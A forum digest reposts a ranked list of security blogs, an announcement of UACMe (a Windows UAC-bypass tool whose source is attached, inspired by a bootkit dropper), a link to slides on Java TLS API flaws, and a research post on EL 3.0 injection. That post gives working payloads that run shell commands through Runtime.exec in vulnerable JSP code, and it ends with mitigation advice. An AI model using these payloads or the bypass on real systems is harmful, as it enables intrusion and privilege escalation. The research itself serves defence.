Nytro

[h=1]Top 100+ Cyber Security Blogs & Infosec Resources[/h] [h=2]PR8[/h] [h=3]#1 CIO[/h] Resources related to information security, including news and opinion and more on software and application flaws and fixes, data breaches, the inside threat the latest hacker attacks. [h=3]#2 TechRepublic – Security[/h] TechRepublic helps IT decision-makers identify technologies and strategies to empower workers and streamline business processes. Their security section dives into the latest threats surrounding cyber security. [h=3]#3 US Cert[/h] US-CERT’s mission is to improve the nation’s cybersecurity posture, coordinate cyber information sharing, and proactively manage cyber risks. [h=3]#4 Wired’s Threat Level[/h] Privacy, crime, and online security are the topics that carry the headlines here. You’ll find everything from opinionated pieces, to the latest threat alerts. [h=3]#5 Zero Day from ZDNet[/h] Staying on top of the latest in software/hardware security research, vulnerabilities, threats and computer attacks. The Zero Day blog on ZDNet is a must for anyone keeping track of the industry. [h=2]PR7[/h] [h=3]#6 CERIAS Security Blog[/h] The Center for Education and Research in Information Assurance and Security blog is where Gene Spafford shares his expertise. It’s called the center for multidisciplinary research for a reason. [h=3]#7 CSO Online[/h] Areas of focus include information security, physical security, business continuity, identity and access management, loss prevention and more. [h=3]#8 Dark Reading[/h] Dark Reading is a comprehensive news and information portal that focuses on IT security, helping information security professionals manage the balance between data protection and user access. [h=3]#9 Google Online Security Blog[/h] This is Google’s own security blog, which focuses on all of the latest developments in the security world. Get the latest news and insights from Google on security and safety on the Internet. [h=3]#10 Red Tape Chronicles[/h] NBC News Red Tape Chronicles brings you news stories and information on the latest developments in the cyber security space. Find topics that range from privacy to security. [h=3]#11 InformationWeek Security[/h] You can expect all of the latest news and zero day alerts from this IT security news site. The content is updated daily and is a major news source for everything to do with cyber security. [h=3]#12 Internet Storm Center[/h] The Internet Storm Center gathers millions of intrusion detection log entries every day, from sensors covering over 500,000 IP addresses in over 50 countries. [h=3]#13 Schneier On Security[/h] Bruce Schneier is an internationally renowned security technologist, and called a “security guru” by The Economist. He knows his stuff and is a voice in the cyber security industry. [h=3]#14 Securelist Cyber Security Blog[/h] This is another Kaspersky Lab web property that focuses on malware, phishing, and the cyber security industry. There is no shortage of information and news on what’s happening in the cyber world. [h=3]#15 Symantec Weblog[/h] The Symantec Weblog uses global research to provide unparalleled analysis of and protection from malware, security risks, vulnerabilities, and spam. [h=3]#16 The Guardian’s Information Security Hub[/h] The Guardian is a respectful, global media company that highlights issues across many areas. Their Information Security Hub lives up to the coverage they offer in other areas and focuses on security. [h=3]#17 Zone Alarm Cyber Security Blog[/h] Information on malware and protecting yourself online. From malware alerts to practical online security tips, the Zone Alarm blog will keep you briefed on the latest industry news. [h=2]PR6[/h] [h=3]#18 BH Consulting’s Security Watch Blog[/h] BH Consulting’s Security Watch Blog was formed to regular, informed with content detailing everything you would want to know about information security and web threats. [h=3]#19 Contagio Malware Dump[/h] Contagio is a collection of the latest malware samples, threats, observations, and analyses. Get informed, technical education on the newest forms of malware. [h=3]#20 Cyber Crime & Doing Time[/h] CyberCrime & Doing Time ia a blog about cyber crime and justice related issues. Gary Warner from Malcovery owns this blog and offers up educational and engaging posts on the latest threats. [h=3]#21 David Lacey’s IT Security Blog[/h] David Lacey’s IT Security Blog offers the latest ideas, best practices, and business issues associated with managing security. The blog is hosted on ComputerWeekly.com. [h=3]#22 Dell SecureWorks[/h] Dell Securework’s Security & Compliance blog is dedicated to providing up-to-date news and information to help IT professionals and others keep their business secure online. [h=3]#23 F-Secure Safe & Savvy Blog[/h] Safe and Savvy blogs about how to protect your online life and the irreplaceable content on your computer. They write about real-life experiences while providing helpful tips on security issues. [h=3]#24 Fox IT Security Blog[/h] Information technology is the main topic on the Fox IT security blog. From news to opinions, Fox IT provides excellent content for anyone interested in technology and security. [h=3]#25 Fortinet Blog[/h] The Fortinet cyber security blog has something for everyone. There are articles on security research and industry trends, as well as, a healthy section focusing entirely on Security 101. [h=3]#26 Help Net Security[/h] Help Net Security has been a prime resource for information security news since 1998. The site always hosts fresh content including articles, new product releases, latest industry news, podcasts and more. [h=3]#28 Infosecurity Magazine[/h] What more can you ask for? It’s an online magazine dedicated entirely to the strategy, insight, and techniques that are a daily part of the cyber security industry. [h=3]#29 Krebs On Security[/h] Brian Krebs is the face of cyber security journalism. As a former writer for the Washington Post, Krebs is able to take is skills as an investigative journalist to the task and provide the most in-depth coverage of security. [h=3]#30 Malwarebytes[/h] Malwarebytes is at the forefront of malware protection, which makes this the perfect blog to stay up-to-date with the latest zero day threats and cyber security news. [h=3]#31 McAfee Security Blog[/h] The McAfee security blog talks about research and threat analysis, as well as, provides knowledgeable insight into malware and zero day threats that plague businesses and consumers. [h=3]#32 Microsoft Malware Protection Center[/h] The Microsoft Malware Protection Center (MMPC) is committed to helping Microsoft customers keep their computers secure. The MMPC stays agile to combat evolving threats. [h=3]#32 Naked Security[/h] Naked Security is Sophos’s award-winning threat news room, giving you news, opinion, advice and research on computer security issues and the latest internet threats. [h=3]#33 Network Computing[/h] Network Computing’s content adheres to the valuable “For IT, By IT” methodology, delivering timely strategy & tactics, news, in-depth features, expert reviews, and opinionated blogs. [h=3]#34 SANS Institute AppSec Blog[/h] SANS Software Security focuses the deep resources of SANS on the growing threats to the application layer by providing training, certification, research, and community initiatives. [h=3]#35 SC Magazine[/h] SC Magazine arms information security professionals with the in-depth, unbiased business and technical information they need to tackle the countless security challenges they face. [h=3]#36 Search Security[/h] Search Security provides immediate access to breaking industry news, virus alerts, new hacker threats and attacks, security and certification training resources. [h=3]#37 Securing The Human[/h] SANS is the most trusted and by far the largest source for information security training and security certification in the world, which makes their blog a must read for security professionals. [h=3]#38 Security Watch[/h] Neil Rubenking heads the charge on PC Mag’s Security Watch. His style is witty and he post frequently, so you’ll always find something worthwhile to read. [h=3]#39 Stop Badware Blog[/h] StopBadware is a nonprofit anti-malware organization whose work makes the Web safer through the prevention, mitigation, and remediation of badware websites. [h=3]#40 Sucuri Blog[/h] Sucuri knows all about malware and WordPress security. It’s what they do. You’ll find no shortage of expert advise on how to secure your WordPress site and keep it malware-free. [h=3]#41 TaoSecurity[/h] Richard Bejtlich’s blog on digital security, concentrating on global challenges posed by China and other targeted adversaries. Definitely a blog that has been a fixture in the security community. [h=3]#42 Techworld Security[/h] The cyber security section on Techworld.com covers news on the latest threats and zero-day exploits. They also offer an abundance of topics ranging from security to how-tos, as well as, technology reviews. [h=3]#43 The Honeynet Project[/h] The Honeynet Project members engage the broader security community and educate the public about threats to systems and information. [h=3]#44 Threatpost[/h] Threatpost, The Kaspersky Lab security news service, is an independent news site which is a leading source of information about IT and business security for hundreds of thousands of professionals worldwide. [h=3]#45 Threat Track Security[/h] Threat Track Security’s IT blog has its thumb on the pulse of the industry. Whether you are in the IT industry or not, if you are interested in security, this blog is for you. [h=3]#46 Trend Micro Simply Security[/h] Trend Micro Simply Security offers independent news and views as well as expert insight from Trend’s security experts. The site covers topics ranging from cloud security, data protection, security and privacy. [h=3]#47 Veracode Blog[/h] Veracode Security Blog: Application security research, security trends and opinions. Everything you want to know about if you work in infosec or online. [h=3]#48 Unmask Parasites Blog[/h] Unmask Parasites focuses on reviewing the latest security threats, zero days, and exploits. There is everything from security-related news, to information on keeping your site secure and malware-free. [h=3]#49 We Live Security[/h] We Live Security is a site about research and information, not products. We Live Security’s writers represent the cream of ESET’s researchers and writers. They deliver in-depth research and analysis on security. [h=3]#50 Xylibox Security Blog[/h] Tracking and demystifying cybercrime is what happens here. The author never fails to produce consistent, detailed breakdowns of the latest malware and security tools. [h=2]PR5[/h] [h=3]#51 BankInfoSecurity[/h] BankInfoSecurity is a multi-media website published by Information Security Media Group, Corp. (ISMG), a company specializing in coverage of information security, risk management, privacy and fraud. [h=3]#52 Cyveillance Blog[/h] From sophisticated DDoS botnet attacks to phishing, the Cyveillance blog will keep you up-to-date with breaking cyber security news and information on everything related to web threats, malware and security. [h=3]#53 Forbe’s Firewall[/h] Forbe’s Firewall covers cyber security news and information on the latest exploits and trends affecting the industry. The articles are on point and informative, with the quality you can expect from Forbes. [h=3]#54 GovInfoSecurity[/h] GovInfoSecurity is a multi-media website published by Information Security Media Group, Corp. (ISMG), a company specializing in coverage of information security, risk management, privacy and fraud. [h=3]#55 Graham Cluley’s Security Blog[/h] Graham Cluley is an award winning cyber security blogger and independent computer security analyst. His blog reflects his knowledge and experience in the industry. [h=3]#56 GRC’s Security Now Podcast[/h] Security Now is a weekly podcast hosted by Steve Gibson and Leo Laporte. The show is sponsored by Gibson Research Corporation, a company specializing in data recovery and security. [h=3]#57 HotforSecurity[/h] This blog covers the sizzling world of computer security. You’ll find plenty of steamy stories from the dynamic world of internet fraud, scams, and malware. [h=3]#58 Imperva Blog[/h] From analyst reports to case studies, to blog posts and white papers, the Imperva blog keeps step with the latest malware and security threats. You’ll find information on DDoS, malware, and zero day threats. [h=3]#59 IT Knowledge Exchange – Security Bytes[/h] Written by the staff of SearchSecurity.com and Information Security magazine, Security Bytes covers topics across the spectrum of security, privacy and compliance. [h=3]#60 ItProPortal.com[/h] ITProPortal.com was one of the very first technology websites to launch in the UK back in 1999 and has grown to become one of the UK’s leading and most respected technology information resources. [h=3]#61 Lenny Zeltser On Information Security[/h] This blog by Lenny Zeltser focuses on information security. Lenny is a business and tech leader with extensive hands-on experience in IT and information security. [h=3]#62 Network Security Blog with Martin McKeay[/h] One man’s views on security, privacy – and anything else for that matter. Trends, information, news: you’ll find it all on the Network Security blog, and what’s more is it’s delivered with style. [h=3]#63 PandaLabs Cyber Security Blog[/h] This blog covers everything you need to know about internet threats. The PandaLabs blog keeps you abreast of the latest developments in cyber security. [h=3]#64 PaulDotCom[/h] PaulDotCom Security weekly’s mission is to provide free content within the subject matter of IT security news, vulnerabilities, hacking, and research. [h=3]#65 Privacy & Information Security Law Blog[/h] The views of one man on security, privacy and anything else that catches his attention. Security expert Martin McKeay talks about malware, privacy and security on this blog. [h=3]#66 Rational Survivability[/h] Hoff’s ramblings about information survivability, information centricity, risk management and disruptive innovation. Hoff was a CISSP, CISA, CISM and NSA IAM, he now spends the AMF money on coffee. [h=3]#67 Risky Business[/h] Risky.biz is another security podcast that focuses on covering recent developments in cyber security and the threat landscape. The show has been around since 2007, and takes a light approach to security news. [h=3]#68 Root Labs RDIST[/h] Their research provides cutting-edge insight into solving tough security problems. There are countless articles on the latest cyber security trends and threats. [h=3]#69 Seculert Blog[/h] The Seculert blog is a security blog with a focus on Advanced Persistent Threats and malware. There is no shortage of network security tips and insider information on the latest zero days. [h=3]#70 Security Street by Rapid7[/h] Rapid7 provides vulnerability management, compliance and penetration testing solutions for web applications, network and database security. Their community, Security Street covers all of these issues. [h=3]#71 Securosis Blog[/h] Securosis is the world’s leading independent security research and advisory firm, offering unparalleled insight and unique value to meet the challenges of managing security and compliance in a Web 2.0 world. [h=3]#72 SilverSky Altitude Blog[/h] SilverSky is a cloud security services provider with a lot of knowledge in the industry. Their blog, the Altitude blog, is updated regularly with news and information every security professional should be aware of. [h=3]#73 SpiberLabs Security Blog[/h] SpiderLabs is an elite team of ethical hackers, investigators and researchers at Trustwave advancing the security capabilities of leading businesses and organizations throughout the world. The site covers the latest security news. [h=3]#74 Social-Engineering.org [/h] Social-Engineering.org is a cyber security blog that covers a wide range of security related topics. The site is also home to a podcast and a team of security professionals who share their expertise on all things security. [h=3]#75 The Security Skeptic[/h] The Security Skeptic blogs about all matters related to Internet Security, from domain names (DNS), firewalls and network security to phishing, malware and social engineering. [h=3]#76 Thought Crime Cyber Security Blog[/h] Moxie Marlinspike’s blog covers computer security and software development, particularly in the areas of secure protocols, cryptography, privacy, and anonymity. [h=3]#77 Troy Hunt’s Blog[/h] Software architect and Microsoft MVP, you’ll find Troy Hunt writing about security concepts and process improvement in software delivery. The quality of content found here makes this blog worth visiting. [h=2]PR4[/h] [h=3]#78 1 Raindrop[/h] Gunnar Peterson weaves his thoughts on distributed systems, security, and software together on his blog 1 Raindrop. The blog is both informative and insightful, and the coverage is on point. [h=3]#79 Andrew Hay’s Cyber Security Blog[/h] Andrew Hay is the Director of Applied Security Research and Chief Evangelist at CloudPassage, Inc. This is his personal blog where he talks about security and other news. [h=3]#80 Carnal Ownage[/h] Carnal Ownage is a must stop for security researchers and hackers alike. This cyber security blog goes into excruciating detail on attack methodology and highlights the threats your organization should be aware of. [h=3]#81 Command Line Kung Fu[/h] This blog covers fun, useful, interesting, security related (and non-security related) tips and tricks associated with the command line. Find tips on OS X, Linux and Windows. [h=3]#82 Dancho Danchev’s Blog[/h] This blog covers trends and fads, tactics and strategies, intersecting with third-party research, speculations and real-time CYBERINT assessments, all packed with sarcastic attitude. [h=3]#83 Darknet[/h] Don’t Learn to HACK – Hack to LEARN. That`s the motto at Darknet. The site covers ethical hacking, penetration testing, and computer security. Learn about interesting infosec related news, tools and more. [h=3]#84 Errata Security [/h] Errata Security is a team of dedicated security researchers that practice offensive security. The insight gained from research is delivered on the blog, which covers a variety of topics and real world scenarios. [h=3]#85 Exotic Liability [/h] Chris Nickerson and Ryan Jones take it up a notch in their cyber security podcast. They routinely thumb their nose at the typical industry rhetoric and offer insight and commentary you won’t hear anywhere else. [h=3]#86 Hack Surfer[/h] HackSurfer was formed by a group of businessmen and women, engineers, mathematicians, linguists and information analysts with a passion for making simple, powerful use of big data. [h=3]#87 InfoSec Institute Resources[/h] The InfoSec Institute resources section has a broad selection of content and research on cyber security, threats, and of course, infosec. You’ll also find tutorials, training videos and more. [h=3]#88 J4vv4D Security Blog[/h] Javvad Malik has worked in information security for his entire career and covers different aspects of security on his blog, J4vv4D. He also regularly offers his insight through entertaining and informative YouTube videos. [h=3]#89 Liquid Matrix[/h] In a world that seems to be losing the notion of journalism, Liquidmatrix Security Digest remains committed to long form articles that dig into the major issues affecting the industry with Feature articles. [h=3]#90 Malcovery Security Blog[/h] This is Malcovery Security’s contribution to the knowledgebase of information security issues. They provide relevant insight and opinions on all of the newest threats faced by the industry. [h=3]#91 Malware Don’t Need Coffee[/h] Malware Don’t Need Coffee is a cyber security blog that focuses on malware research and provides educated commentary on all the latest exploits and security bugs. The site covers research in all areas of network security. [h=3]#92 McGrew Security Blog[/h] Wesley McGrew understands security and the nature of today’s digital landscape, especially its impact on infrastructure and business security. His blog covers all of the important cyber security stuff. [h=3]#93 Network Security Podcast[/h] Since 2007, the Network Security Podcast has been dishing out the dirt on cyber threats and security issues faced by the industry. It’s a great resource if you want to hear a discussion on what’s happening in infosec. [h=3]#94 New School Security[/h] This blog is inspired by the book and the movement towards a New School. The New School of Information Security is a book by Adam Shostack and Andrew Stewart, published in 2008. [h=3]#95 NoVA Infosec[/h] Founded in January of 2008 on a Saturday evening, NovaInfosec.com is dedicated to the community of Northern Virginia-, Washington, DC-, and southern Maryland-based security professionals. [h=3]#96 Packet Pushers Podcast[/h] The Packet Pushers Podcast offers deeply technical, hardcore discussions on the latest security trends. Co-hosts Greg Ferro and Ethan Banks lead the show with their many years of network engineering. [h=3]#97 Security Affairs[/h] Pierluigi Paganini is a company director, researcher, security evangelist, security analyst and freelance writer. His blog Security Affairs stays abreast of all the latest in cyber security. [h=3]#98 Security Bistro[/h] Security Bistro is where security experts come together for good talk, information on the latest ingenious threats and, one hopes, the latest clever ways to counter them. [h=3]#99 Security Geeks[/h] Find tips on computer security, choosing a password properly, and other practical online security tips. No shortage of interesting content circling the technology space here. [h=3]#100 Security Musings[/h] Gemini Security Solutions, Inc. is an information security consulting firm that applies creativity, passion, and insight to defend against today’s growing threats. Their blog, Security Musings, covers everything security. [h=3]#101 Security Uncorked[/h] Jennifer (Jabbusch) Minella aka JJ is a network security engineer and consultant with 15 years of experience. She shares her knowledge on infosec on her blog and offers plenty of information on the latest security trends. [h=3]#102 S!Ri.URZ[/h] This blog has been on the cyber security scene since as far back as 2006. The blog covers malware, rogues, ransomeware and everything else related to cyber security. [h=3]#103 The AShimmy Blog[/h] StillSecureAfterAllTheseYears.com (yes, a really long domain!) is the AShimmy Blog, Alan Shimel’s personal blogger blog on security, work, and family life. [h=3]#104 The Falcon’s View[/h] Ben Tomhave is a security professional that has served the industry in a variety of roles and security positions. This is reflected in his writing and the knowledge shared on his cyber security blog. [h=3]#105 The Harmony Guy[/h] You’ll find links and commentary related mostly to online privacy and security, particularly with social networking. The blog started back in 2007 and has been going ever since. [h=3]#106 The Southern Fried Security Podcast[/h] The SFS Podcast is designed to be an information security podcast that fills the gap between technical security podcasts and Security Now. This podcast offers respectful insight on the state of security. [h=3]#107 Uncommon Sense Security[/h] Small business information security has been an oxymoron for too long. Uncommon Sense Security is attempting to change that. The blog is entertaining, and informative at the same time. [h=2]PR3[/h] [h=3]#108 Andy Ellis — Protecting A Better Internet[/h] Andy Ellis is the Chief Security Officer of Akamai Technologies. Opinions here are mostly his own. His blog dives into the issues centered around cyber security and technology. [h=3]#109 DHS Daily Report[/h] A U.S. Army Retired Chief Warrant Officer with more than 40 years in information technology and 35 years in information security leads the charge on this blog, offering daily news on the industry. [h=3]#110 IT Security Expert by Dave Whitelegg[/h] The UK based IT Security Expert blog by Dave Whitelegg CISSP CCSP providing general Information Security advice & help in securing the home PC & home computer user, as well as business IT systems. [h=3]#111 IT Specialist[/h] A virtual community of social networks for IT professionals located throughout the world. A great way to connect and collaborate with others in the cyber security industry. [h=3]#112 MichaelPeters.org[/h] Michael D. Peters has been an independent information security consultant, executive, researcher, author, and catalyst with many years of information technology and shares that information on his site. [h=3]#113 Rivalhost Security Blog[/h] Rivalhost is a DDOS mitigation company and web host that takes an active stance on updating their customers and community with a mix of topics on technology, cyber security, and DDOS. [h=3]#114 Rud.is Security Blog[/h] This is a place to catch some opines on a pretty weird combination of topics. You’ll likely see topics ranging from IT/Information Risk Management to iOS, Node.js, and everything in-between. [h=3]#115 Security Xploded Blog[/h] SecurityXploded – the community division of XenArmor – is a popular Infosec Research & Development organization offering free security software, latest research articles and free cyber security training. [h=3]#116 Thom Langford’s Personal Security Blog[/h] An information security professional, award winning blogger, and industry commentator. Thom Langford talks about topics relating to information security, risk management and compliance. [h=3]#117 W. Mark Brooks IT Security Blog[/h] On his cyber security blog Brooks talks about mitigating risks and business strategies as they relate to IT. There is never a dull post and the author finds plenty of interesting security topics to dissect. [h=2]PR2[/h] [h=3]#118 Ethical Hacking[/h] Ehacking.net explores ethical hacking, penetration testing, and hacking. You’ll also find a wealth of tutorials on BackTrack and other penetration testing tips. An ideal site for information security researchers. [h=3]#119 IT Security Column[/h] An IT security blog that features general knowledge of IT security, online crime news, and tips on how to deal with online and computer threats. Plus, listings of information security threats and defenses. [h=3]#120 Kevin Townsend’s Cyber Security Blog[/h] This site is about computer and information security. It is maintained by Kevin Townsend, the original founder of ITsecurity.com and a freelance journalist and writer with more than 10 years experience. [h=3]#121 Psilva’s Prophecies[/h] Peter Silva covers security for F5 Networks Technical Marketing Team. With his theatre background and knowledge of security his blog makes for an interesting pit stop for security news. [h=3]#122 Websense Security Labs[/h] Websense Security Labs does a great job of sharing information and insight on the latest cyber security news. Their blog has been around since ’07. There is plenty of material to dig through for research. [h=2]PR1[/h] [h=3]#123 DDoS Protection & Cyber Security Blog[/h] A blog that centers around the threat posed by distributed denial of service (DDoS) attacks. You’ll find a news section that offers a snapshot of the latest security trends, as well as, epic posts highlighting the industry. [h=3]#124 Dave Waterson on Security[/h] Dave Waterson is an experienced IT security technologist, inventor of patented and patent-pending security technology in the anti-key logging and anti-phishing fields. [h=3]#125 Following The Wh1t3 Rabbit [/h] Rafal Los has been working in the defensive side of security for over 10 years. His blog, Following The Wh1t3 Rabbit, focuses on clearing the confusion around security and offering tools to improve security. [h=2]PR0[/h] [h=3]#126 FireEye Blog[/h] FireEye has invented a purpose-built, virtual machine-based security platform that provides real-time threat protection. FireEye has been called a “hot security firm” — their blog backs that up. [h=3]# 127 How They Hack[/h] HowTheyHack is a general tech blog surrounding themes related to hacking and network security. Most of the posts are centered around tutorials, hacking news, security exploits and the author’s opinions. [h=3]# 128 Technology.info[/h] Technology.info combines the best of ITProPortal.com and IP EXPO, offering a resource for IT professionals and those interested in security. The boasts a wide variety of information security research and topics. Sursa: Top 100+ Cyber Security Blogs & Infosec Resources

UACMe - Defeating Windows User Account Control by EP_X0FF » Fri Dec 19, 2014 8:19 am Inspired by ITW WinNT/Pitou legacy MBR x86-64 bootkit dropper. Before anything else read this excellent work -> Windows 7 UAC whitelist, read it carefully as it explains everything especially why Windows User Account Control is a big fucken marketing joke from Microsoft just like DSE. Below is our variant of his work with removal of all C++ trash and adapting different UAC bypass method from WinNT/Pitou (bootkit authors also used as base Leo Davidson work). The only setting UAC somehow is able to show itself - if they are set on maximum. But here revealed another Microsoft UAC architecture flaw by design - even when it blocks something, it cannot properly determine what it blocked, representing possible malicious actions as taken by Microsoft, facepalm. Will you trust verified Microsoft action with verified digital certificate from Microsoft? Supported Windows version, all from 7xxx builds up to latest so "confidential" MS build 9901. Project overview: Win32 and x64 configurations. Compiled in MSVS 2013 U4, used pure C, compiled as C++ No additional dependencies. All libs in attach. Debug builds configurations present only for debugging stuff not for UAC bypass stage execution (shellcode will be screwed up). Require Heavens Gate adaptation for proper work from Win32 app under WOW64, if you don't know what is HG then skip this moment. x64 loader VT https://www.virustotal.com/en/file/78caa8fa31a802547b160f41c03fd825d01d1edcd064e06984d0cf84a3bc7813/analysis/1418968668/ x86-32 loader VT https://www.virustotal.com/en/file/97952e6bb9cb4b3c43215597be0bb1da504d2066fd1717c20d6fd64917311c06/analysis/1418968812/ Screeenshots taken from Windows 10 TP build 9901 uac101.png (325.47 KiB) Viewed 16 times uac102.png (215.73 KiB) Viewed 16 times Attachments UACME.rar pass: uacme(498.9 KiB) Downloaded 6 times Sursa: KernelMode.info • View topic - UACMe - Defeating Windows User Account Control

Java's SSLSocket:How Bad APIs Compromise Security Tale of a Frustrated Android Developer Dr. Georg Lukas <lukas@rt-solutions.de> A brief history of SSL/TLS Java TLS APIs: All-or-nothing security Making your (Android) application more secure TLS in the Post-Snowden Era\ Download: https://deepsec.net/docs/Slides/2014/Java%27s_SSLSocket_-_How_Bad_APIs_Compromise_Security_-_Georg_Lukas.pdf

[h=3]EL 3.0/Lambda Injection: Hacker Friendly Java[/h]The following article explains the mechanics of a code injection attack called EL3 Injection in applications that make use of the relatively new EL3 processor in java. New mechanics and operators introduced in EL3 make the discovery and exploitation of this exposure almost as easy and seamless as SQL Injection, and the impact of the vulnerability is severe, with potential impacts such as denial of service, information theft and even remote code execution. Since the EL3 technology is relatively new it's probably not (YET) as common as other severe exposures, but at the very least, it will put a big wide THEY DID WHAAAAT!? smile on your face. [Note – The following article discusses a generic application-level coding flaw in modern Java applications, NOT a java 0-day. Keep on reading – the juicier RCE payloads are presented at the end] While trying to (and miserably failing at) create a training kit for EL Injection (or Spring EL Injection, JSR245, if you will), published by Stefano Di Paola and Arshan Dabirsiaghi, I spent some time trying to get a working build of the eclipse-based STS IDE version which supported the vulnerable Java Spring MVC versions (Spring 3.0.0-3.0.5). Turns out that someone did a REALLY GOOD job eradicating every trace of the vulnerable builds, leaving only time consuming options of compiling the environment from scratch. Luckily, at some point, I decided to take a short break, and read about the relatively new EL in Java (JSR341, not necessarily in Java Spring) – and found something VERY interesting. Turns out that the newest java expression language version, EL 3.0 (published sometime in 2013), includes multiple enhancements, such as operators, security restrictions on class access, and so on. A typical source code sample of using EL3 in a Servlet or JSP page would look something like: [TABLE=align: left] [TR] [TD]<%@page import="javax.el.ELProcessor"%> … <% ELProcessor elp = new ELProcessor(); Object msg = elp.eval("'Welcome' + user.name"); out.println(msg.toString()); %> [/TD] [/TR] [/TABLE] The ELProcessor dynamically evaluates the EL statement, and attempts to access the "name" fields of the Bean (or registered class) user. After taking a couple of shots at "guessing" objects that might be accessible by default, I stumbled on one of the features that can be used to define access to classes in EL3, which includes the ELManager class methods importClass, importPackage and importStatic. These methods could be used to "import" various classes and even packages into the scope of the expression language, so they could be referenced within expressions. So in order to use classes in EL3 expressions, you'll need to include them using statements such as – [TABLE=align: left] [TR] [TD]elp.getELManager().importClass("java.io.File"); [/TD] [/TR] [/TABLE] This feature was implemented due to safety concerns (or in other words, security), to make sure that access to classes is presumably prevented for any class that was not also included in the page/project original EL imports AND application imports, so that even if developers will enable user input to affect the "importPackage" or "importClass" statements, the external effect will be limited to the classes already imported in the context. However, since many interesting classes and packages are typically used in Servlets and JSP pages, an attacker can still abuse this feature in multiple scenarios – (1) If the developer already imported a class that the attacker needs into the EL context, and an attacker controlled input is used within the expression evaluation: [TABLE=align: left] [TR] [TD]Input1 = "File.listRoots()[0].getAbsolutePath()" [/TD] [/TR] [TR] [TD]<%@page import="javax.el.ELProcessor"%> <%@page import="javax.el.ELManager"%> … <% String input1 = request.getParameter("input1"); ELProcessor elp = new ELProcessor(); elp.getELManager().importClass("java.io.File"); Object path = elp.eval(input1); out.println(path); %> [/TD] [/TR] [/TABLE] (2) If the developer enabled the user to control the importClass/Package statement (no limits to human stupidity, right?), and already has a wide enough scope imported in the page/application imports: [TABLE=align: left] [TR] [TD]Input1 = "File.listRoots()[0].listFiles()[1].getAbsolutePath()" Input2 = "java.io.File"; [/TD] [/TR] [TR] [TD]<%@page import="javax.el.ELProcessor"%> <%@page import="javax.el.ELManager"%> … <% String input1 = request.getParameter("input1"); String input2 = request.getParameter("input2"); ELProcessor elp = new ELProcessor(); elp.getELManager().importClass(Input2); Object path = elp.eval(input1); out.println(path); %> [/TD] [/TR] [/TABLE] So, here you go. A nice exploit that will probably affect a couple of desolate apps, with super insecure code. Hardly worth its own classification. However, while trying to squeeze some more juice out of the potential attack vector, I stumbled upon the following , which explains the features of EL3 in great details.To make a long story short, watch the video and skip to 7:52. It's well worth your time. Turns out that despite the security restrictions that required developers to explicitly import classes and packages to be used in the EL3 scripts, the java.lang package was included by default, to enable the typical developer to gain access to static type object and methods such as Boolean.TRUE and Integer.numberOfTrailingZeros. They enabled access by default to the static members of classes in JAVA.LANG, as in the java.lang package that includes java.lang.System and java.lang.Runtime! JAVA.LANG! Seems like somebody there confused "user friendly" with "hacker friendly" J So, if for some reason, a user controlled input would stumble into an EL3 eval clause, which for some reason java is encouraging users to use in many platforms such as JSF, CDI, Avatar and many CMSs, than attackers could do a LOT more with no requirements on specific imports - [TABLE=align: left] [TR] [TD]Input1 = "System.getProperties()" [/TD] [/TR] [TR] [TD]<%@page import="javax.el.ELProcessor"%> <%@page import="javax.el.ELManager"%> … <% String input1 = request.getParameter("input1"); ELProcessor elp = new ELProcessor(); Object sys = elp.eval(input1); out.println(sys); %> [/TD] [/TR] [/TABLE] Also, Instead of using the System class, we can use the Runtime static class methods to execute shell commands. For example: [TABLE=align: left] [TR] [TD]Input1 = "Runtime.getRuntime().exec('mkdir abcde').waitFor()" [/TD] [/TR] [TR] [TD]<%@page import="javax.el.ELProcessor"%> <%@page import="javax.el.ELManager"%> … <% String input1 = request.getParameter("input1"); ELProcessor elp = new ELProcessor(); Object sys = elp.eval(input1); out.println(sys); %> [/TD] [/TR] [/TABLE] An impact similar to that of the Spring's counterpart of EL injection, only in mainstream Java. Cool. Now we can shamelessly classify the attack and rest. But there's more! Although scenarios in which the user's input will get full control of the entire EL string are possible, they are much less common than scenarios in which user input might be integrated as a part of an EL string, in which case most of the previously mentioned payloads won't work. However, EL 3.0 was kind enough to present us with NEW operators, one of which is the infamous semicolon (. As its SQL counterpart functionality suggests, the semicolon delimiter can be used in EL 3 to close one expression, and add additional expressions, with or without logical relations to each other. Think adding multiple lines of code to a single attack payload. Think injecting payloads into the middle of expression, while using techniques similar to blind SQL injection. Don't think. Here's a couple of examples: [TABLE=align: left] [TR] [TD]Input1 = "; Runtime.getRuntime().exec('mkdir aaaaa12').waitFor()" [/TD] [/TR] [TR] [TD]<%@page import="javax.el.ELProcessor"%> <%@page import="javax.el.ELManager"%> … <% String input1 = request.getParameter("input1"); ELProcessor elp = new ELProcessor(); Object sys = elp.eval(("'Welcome' + input1); out.println(sys); %> [/TD] [/TR] [/TABLE] [TABLE=align: left] [TR] [TD]Input1 = "1); Runtime.getRuntime().exec('mkdir jjjbc12').waitFor(" [/TD] [/TR] [TR] [TD]<%@page import="javax.el.ELProcessor"%> <%@page import="javax.el.ELManager"%> … <% String input1 = request.getParameter("input1"); ELProcessor elp = new ELProcessor(); Object sys = elp.eval(("SomeClass.StaticMethod( + input1 + ")"); out.println(sys); %> [/TD] [/TR] [/TABLE] So due to the implementation of the semicolon operator, potential injections can now CLOSE PREVIOUS STATEMENTS and start new statements, making the potential injection almost as usable as SQL injection. Features such as EL variable declaration, value assignments and others (watch the video) just add more fuel to the fire. So much for enhanced security features. We already identified a few instances that affect real world applications (no instances in core products, so far), and are currently handling them infront of the relevant entities. I'll probably invest some more time in the upcoming weeks to see if any prominent java projects are prone to this issue, but in the meantime, some practical notes: Regardless of how common these issues are, these potential exposures could easily be identified in code reviews or by source code analysis tools that track the effect of input on the various methods of the ELProcessor class, and on similar EL related classes. Generic blind injection payloads can be added as plugins for automated scanners, and we could go bug hunting to see if any more of these potential issues exists in the wild. The mitigation is also simple, not embedding input into EL statements and validating input in case you do. I'll update this post as the research progresses. Cheers Posted by Shay Chen at 4:13 AM Sursa: Security Tools Benchmarking: EL 3.0/Lambda Injection: Hacker Friendly Java

